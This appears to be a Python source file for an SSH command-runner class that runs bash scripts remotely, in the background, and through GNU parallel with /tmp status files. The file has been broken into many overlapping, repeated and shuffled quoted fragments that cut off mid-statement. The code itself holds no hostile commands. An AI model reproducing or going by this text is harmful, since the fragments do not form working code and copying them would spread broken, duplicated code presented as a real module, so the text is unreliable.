"* 60): return self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script, output_timeout=20 * 60): self._logger.debug(\"Running bash",
"tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs) command = \"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd])",
"$!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return",
"base_dir = tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\") err_filename =",
"\".err\" status_filename = random_base + \".retcode\" command = \"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'",
"+ \".retcode\" command = \"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s",
"as e: e.args += ('When running bash script \"%s\"' % command), raise def",
"raise subprocess.CalledProcessError(status, command) finally: chan.close() def background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename",
"err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError as e: raise Exception(\"Failed running",
"'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict(",
"max_jobs=None, output_timeout=20 * 60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs) command",
"-1) stdout = chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb', -1) stdin.close() output = self._read_output(stdout,",
"<< 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def execute(self, command, output_timeout=20 * 60):",
"CalledProcessError class Run(object): def __init__(self, ssh_client): self._ssh_client = ssh_client self._logger = logging.getLogger('ssh') def",
"segment == \"\": break output_array.append(segment) except socket.timeout: output = \"\".join(output_array) e = socket.timeout(",
"random_base + \".pid\" out_filename = random_base + \".out\" err_filename = random_base + \".err\"",
"\"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts,",
"\"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\" %",
"stdin.close() output = self._read_output(stdout, output_timeout) status = chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process =",
"= \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix), joined_script_commands,",
"== \"\": break output_array.append(segment) except socket.timeout: output = \"\".join(output_array) e = socket.timeout( \"Timeout",
"out_filename, err_filename, status_filename) except CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\"",
"self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if status != 0: self._logger.debug(f'command {command} failed with errorcode",
"scripts, max_jobs, \" 1>%s 2>%s &\" % (out_filename, err_filename)) command = \"\\n\".join([\"mkdir %s\"",
"\\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process finally: chan.close() def _read_output(self,",
"out_filename = random_base + \".out\" err_filename = random_base + \".err\" status_filename = random_base",
"def _read_output(self, stdout, output_timeout): output_array = [] try: while True: segment = stdout.read().decode('utf-8')",
"_read_output(self, stdout, output_timeout): output_array = [] try: while True: segment = stdout.read().decode('utf-8') if",
"segment = stdout.read().decode('utf-8') if segment == \"\": break output_array.append(segment) except socket.timeout: output =",
"output = self._read_output(stdout, output_timeout) status = chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command,",
"output_timeout) def execute(self, command, output_timeout=20 * 60): transport = self._ssh_client.get_transport() chan = transport.open_session()",
"output_timeout) return parallel.Parallel(self, scripts, base_dir) except Exception as e: e.args += ('When running",
"= chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb', -1) stdin.close() output = self._read_output(stdout, output_timeout) status",
"= random_base + \".retcode\" command = \"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null",
"[] try: while True: segment = stdout.read().decode('utf-8') if segment == \"\": break output_array.append(segment)",
"raise e return \"\".join(output_array) def _exec(self, command): transport = self._ssh_client.get_transport() chan = transport.open_session()",
"chan.exec_command(command) status = chan.recv_exit_status() if status != 0: raise subprocess.CalledProcessError(status, command) finally: chan.close()",
"command = \"\\n\".join([\"mkdir %s\" % base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\",",
"% base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo",
"output_timeout=20 * 60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs) command =",
"try: chan.exec_command(command) status = chan.recv_exit_status() if status != 0: raise subprocess.CalledProcessError(status, command) finally:",
"i, script in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT'",
"dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if status != 0: self._logger.debug(f'command {command} failed with",
"\"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def execute(self, command, output_timeout=20",
"logging from automation_infra.plugins import background, parallel import tempfile import os import subprocess from",
"= os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs, \"",
"import logging from automation_infra.plugins import background, parallel import tempfile import os import subprocess",
"= tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir,",
"pid=parallel.Parallel.pidfile(base_dir, i)) for i, script in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice",
"% (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None, output_timeout=20 * 60): base_dir",
"try: self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename, err_filename, status_filename) except CalledProcessError as",
"\"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self,",
"parallel_cmd]) try: self.execute(command, output_timeout) return parallel.Parallel(self, scripts, base_dir) except Exception as e: e.args",
"command), raise def background_parallel(self, scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\")",
"import socket import logging from automation_infra.plugins import background, parallel import tempfile import os",
"1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir,",
"script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout)",
"self._exec(command) except CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\" % (bash_script,",
"'%s'. Partial output was\\n:%s\" % ( output_timeout, output)) e.output = output raise e",
"= self._parallel_commands(base_dir, scripts, max_jobs) command = \"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd]) try: self.execute(command,",
"$?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self,",
"%(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if status != 0: self._logger.debug(f'command {command} failed",
"out_filename, err_filename, status_filename) def _parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs = max_jobs or",
"self._logger.debug(f'command {command} failed with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args,",
"os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir,",
"command = \"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd]) try: self.execute(command, output_timeout) return parallel.Parallel(self, scripts,",
"input for timeout of '%s'. Partial output was\\n:%s\" % ( output_timeout, output)) e.output",
"pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError as e: raise Exception(\"Failed running '%s',",
"def script_v2(self, bash_script, output_timeout=20 * 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([",
"&\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=bash_script, out=out_filename, err=err_filename,",
"subprocess import CalledProcessError class Run(object): def __init__(self, ssh_client): self._ssh_client = ssh_client self._logger =",
"= max_jobs or 0 script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\"",
"+= ('When running bash script \"%s\"' % command), raise def background_parallel(self, scripts, max_jobs=None):",
"def background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base + \".pid\" out_filename",
"% (out_filename, err_filename)) command = \"\\n\".join([\"mkdir %s\" % base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'",
"% command), raise def background_parallel(self, scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir,",
"status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename, err_filename, status_filename)",
"return \"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def",
"scripts, max_jobs, command_suffix=\"\"): max_jobs = max_jobs or 0 script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s&",
"status = chan.recv_exit_status() if status != 0: raise subprocess.CalledProcessError(status, command) finally: chan.close() def",
"dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def",
"dir='/tmp/') pid_filename = random_base + \".pid\" out_filename = random_base + \".out\" err_filename =",
"= socket.timeout( \"Timeout executing, no input for timeout of '%s'. Partial output was\\n:%s\"",
"i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for i, script in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands)",
"= tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs) command = \"\\n\".join([\"mkdir %s\" % base_dir,",
"if status != 0: self._logger.debug(f'command {command} failed with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr:",
"executing, no input for timeout of '%s'. Partial output was\\n:%s\" % ( output_timeout,",
"<< 'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None, output_timeout=20",
"script in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\"",
"bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def execute(self, command, output_timeout=20 * 60): transport =",
"% ( output_timeout, output)) e.output = output raise e return \"\".join(output_array) def _exec(self,",
"out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError as e: raise Exception(\"Failed",
"= random_base + \".out\" err_filename = random_base + \".err\" status_filename = random_base +",
"echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try:",
"error = stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr = error completed_process.stdout = output",
"chan = transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1) stdout = chan.makefile('rb',",
"!= 0: self._logger.debug(f'command {command} failed with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise",
"except CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\" % (bash_script, e.returncode))",
"self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) status = chan.recv_exit_status() if status != 0:",
"status != 0: raise subprocess.CalledProcessError(status, command) finally: chan.close() def background_script(self, bash_script): random_base =",
"2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i),",
"max_jobs, command_suffix=\"\"): max_jobs = max_jobs or 0 script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s& echo",
"script_v2(self, bash_script, output_timeout=20 * 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh",
"$!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for",
"/dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename,",
"_exec(self, command): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) status = chan.recv_exit_status()",
"bash_script, output_timeout=20 * 60): return self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script, output_timeout=20 * 60):",
"random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base + \".pid\" out_filename = random_base +",
">& /dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename, err=err_filename,",
"= self._read_output(stdout, output_timeout) status = chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status)",
"bash_script, output_timeout=20 * 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh <<",
"for i, script in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d <<",
"output: %(output)s\", dict(output=output)) if status != 0: self._logger.debug(f'command {command} failed with errorcode {completed_process.returncode}:",
"'%s'\" % (bash_script, e.returncode)) return background.Background(self, bash_script, pid_filename, out_filename, err_filename, status_filename) def _parallel_commands(self,",
"command, output_timeout=20 * 60): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout)",
"out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for i, script in enumerate(scripts)]",
"i), pid=parallel.Parallel.pidfile(base_dir, i)) for i, script in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel",
"$!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i))",
"\"\".join(output_array) def _exec(self, command): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) status",
"scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\")",
"class Run(object): def __init__(self, ssh_client): self._ssh_client = ssh_client self._logger = logging.getLogger('ssh') def script(self,",
">& /dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=bash_script,",
"60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs) command = \"\\n\".join([\"mkdir %s\"",
"base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\"",
"True: segment = stdout.read().decode('utf-8') if segment == \"\": break output_array.append(segment) except socket.timeout: output",
"max_jobs) command = \"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd]) try: self.execute(command, output_timeout) return parallel.Parallel(self,",
"= \"\".join(output_array) e = socket.timeout( \"Timeout executing, no input for timeout of '%s'.",
"= \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def execute(self, command,",
"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict(",
"while True: segment = stdout.read().decode('utf-8') if segment == \"\": break output_array.append(segment) except socket.timeout:",
"for timeout of '%s'. Partial output was\\n:%s\" % ( output_timeout, output)) e.output =",
"import CalledProcessError class Run(object): def __init__(self, ssh_client): self._ssh_client = ssh_client self._logger = logging.getLogger('ssh')",
"e: e.args += ('When running bash script \"%s\"' % command), raise def background_parallel(self,",
"e = socket.timeout( \"Timeout executing, no input for timeout of '%s'. Partial output",
"* 60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs) command = \"\\n\".join([\"mkdir",
"self._logger = logging.getLogger('ssh') def script(self, bash_script, output_timeout=20 * 60): return self.script_v2(bash_script, output_timeout).stdout def",
"chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr = error completed_process.stdout =",
"parallel.Parallel(self, scripts, base_dir) except Exception as e: e.args += ('When running bash script",
"( output_timeout, output)) e.output = output raise e return \"\".join(output_array) def _exec(self, command):",
"%s\" % base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait",
"chan.close() def background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base + \".pid\"",
"= \"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo",
"chan.makefile('wb', -1) stdout = chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb', -1) stdin.close() output =",
"dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError as e:",
"max_jobs, \" 1>%s 2>%s &\" % (out_filename, err_filename)) command = \"\\n\".join([\"mkdir %s\" %",
"output_timeout, output)) e.output = output raise e return \"\".join(output_array) def _exec(self, command): transport",
"scripts, base_dir) except Exception as e: e.args += ('When running bash script \"%s\"'",
"Partial output was\\n:%s\" % ( output_timeout, output)) e.output = output raise e return",
"def script(self, bash_script, output_timeout=20 * 60): return self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script, output_timeout=20",
"running bash script \"%s\"' % command), raise def background_parallel(self, scripts, max_jobs=None): base_dir =",
"self.execute(command, output_timeout) return parallel.Parallel(self, scripts, base_dir) except Exception as e: e.args += ('When",
"os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s 2>%s &\" % (out_filename,",
"output_timeout=20 * 60): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin",
"echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try:",
"random_base + \".retcode\" command = \"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\",",
"err_filename)) command = \"\\n\".join([\"mkdir %s\" % base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null",
"stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if status != 0:",
"= tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base + \".pid\" out_filename = random_base + \".out\"",
"e.output = output raise e return \"\".join(output_array) def _exec(self, command): transport = self._ssh_client.get_transport()",
"pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\") status_filename",
"try: self.execute(command, output_timeout) return parallel.Parallel(self, scripts, base_dir) except Exception as e: e.args +=",
"output_timeout).stdout def script_v2(self, bash_script, output_timeout=20 * 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command =",
"running '%s', status '%s'\" % (bash_script, e.returncode)) return background.Background(self, bash_script, pid_filename, out_filename, err_filename,",
"(bash_script, e.returncode)) return background.Background(self, bash_script, pid_filename, out_filename, err_filename, status_filename) def _parallel_commands(self, base_dir, scripts,",
"status '%s'\" % (bash_script, e.returncode)) return background.Background(self, bash_script, pid_filename, out_filename, err_filename, status_filename) def",
"output stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if status",
"('When running bash script \"%s\"' % command), raise def background_parallel(self, scripts, max_jobs=None): base_dir",
"error completed_process.stdout = output stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\",",
"% dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for i, script",
"= self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) status = chan.recv_exit_status() if status !=",
"completed_process.stderr = error completed_process.stdout = output stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution",
"= transport.open_session() try: chan.exec_command(command) status = chan.recv_exit_status() if status != 0: raise subprocess.CalledProcessError(status,",
"return self.execute(command, output_timeout) def execute(self, command, output_timeout=20 * 60): transport = self._ssh_client.get_transport() chan",
"subprocess.CalledProcessError(status, command) finally: chan.close() def background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename =",
"/dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=bash_script, out=out_filename,",
"base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs = max_jobs or 0 script_commands = [\"((%(script)s 1>%(out)s",
"--jobs=%d << 'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None,",
"finally: chan.close() def _read_output(self, stdout, output_timeout): output_array = [] try: while True: segment",
"= output raise e return \"\".join(output_array) def _exec(self, command): transport = self._ssh_client.get_transport() chan",
"{command} failed with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout,",
"= os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s 2>%s &\" %",
"err_filename, status_filename) except CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\" %",
"(out_filename, err_filename)) command = \"\\n\".join([\"mkdir %s\" % base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >&",
"output_array = [] try: while True: segment = stdout.read().decode('utf-8') if segment == \"\":",
"CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process finally: chan.close() def _read_output(self, stdout, output_timeout): output_array",
"background.Background(self, bash_script, pid_filename, out_filename, err_filename, status_filename) def _parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs",
"os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s",
"completed_process.stdout = output stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output))",
"i)) for i, script in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d",
"= chan.makefile('wb', -1) stdout = chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb', -1) stdin.close() output",
"0: raise subprocess.CalledProcessError(status, command) finally: chan.close() def background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/')",
"output_timeout=20 * 60): return self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script, output_timeout=20 * 60): self._logger.debug(\"Running",
"= \"\\n\".join([\"mkdir %s\" % base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s",
"\"Timeout executing, no input for timeout of '%s'. Partial output was\\n:%s\" % (",
"= chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr = error completed_process.stdout",
"* 60): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin =",
"= error completed_process.stdout = output stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output:",
"\"\\n\".join([\"mkdir %s\" % base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s echo",
"CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\" % (bash_script, e.returncode)) return",
"from subprocess import CalledProcessError class Run(object): def __init__(self, ssh_client): self._ssh_client = ssh_client self._logger",
"% base_dir, parallel_cmd]) try: self.execute(command, output_timeout) return parallel.Parallel(self, scripts, base_dir) except Exception as",
"\"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait",
"= ssh_client self._logger = logging.getLogger('ssh') def script(self, bash_script, output_timeout=20 * 60): return self.script_v2(bash_script,",
"err_filename = os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs,",
"self._read_output(stdout, output_timeout) status = chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr",
"logging.getLogger('ssh') def script(self, bash_script, output_timeout=20 * 60): return self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script,",
"(max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None, output_timeout=20 * 60): base_dir =",
"status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError as e: raise Exception(\"Failed running '%s', status",
"!= 0: raise subprocess.CalledProcessError(status, command) finally: chan.close() def background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background',",
"status = chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr = error",
